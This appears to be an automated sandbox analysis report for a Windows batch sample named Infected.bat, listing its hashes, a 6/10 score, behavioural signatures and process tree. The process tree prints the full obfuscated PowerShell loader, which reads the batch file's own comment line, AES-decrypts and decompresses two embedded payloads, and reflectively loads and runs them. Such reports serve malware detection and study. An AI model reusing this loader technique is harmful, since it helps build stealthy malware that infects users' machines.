Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-10-2024 23:12
Static task
static1
Behavioral task
behavioral1
Sample
Infected.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
General
-
Target
Infected.bat
-
Size
74KB
-
MD5
25d86af45fcc93078ac8ff2dd1e83314
-
SHA1
fd00fd08a9e264bf2470ca17d4b118522fae48fa
-
SHA256
40268fb4a5e084301d9b6ab32e204b19ca690bea4dbff104881f794f036c4c56
-
SHA512
518ccc58c6c4eb3c744f4f417892d802dfa13cdb0fbc98020787b5534d12d602e8087741189dfa9ea7eeff9ce09714638b144771692e375fa93d249609debe24
-
SSDEEP
768:s1yoKUYWJ5jQm6+iPOf9EwY+yIkwJJke7RA65LyTUtwfMMT4bKfdYeXAG6qUo+Rd:Boqa5jHdlFMIkylRB5Gjeep6q6vSp2SY
Score
6/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 580 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2544 wrote to memory of 580 2544 cmd.exe powershell.exe PID 2544 wrote to memory of 580 2544 cmd.exe powershell.exe PID 2544 wrote to memory of 580 2544 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Infected.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rfPx2/qjPEULy3w9Vw91tAJgXSLsh+wieWCmL2bqeJE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uoQNNJFNYFBjzV7jmi3PfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $huwyq=New-Object System.IO.MemoryStream(,$param_var); $asgET=New-Object System.IO.MemoryStream; $pgUdN=New-Object System.IO.Compression.GZipStream($huwyq, [IO.Compression.CompressionMode]::Decompress); $pgUdN.CopyTo($asgET); $pgUdN.Dispose(); $huwyq.Dispose(); $asgET.Dispose(); $asgET.ToArray();}function execute_function($param_var,$param2_var){ $MXcqt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wghyx=$MXcqt.EntryPoint; $wghyx.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Infected.bat';$dNySU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Infected.bat').Split([Environment]::NewLine);foreach ($NKwGP in $dNySU) { if ($NKwGP.StartsWith(':: ')) { $rNMtY=$NKwGP.Substring(3); break; }}$payloads_var=[string[]]$rNMtY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580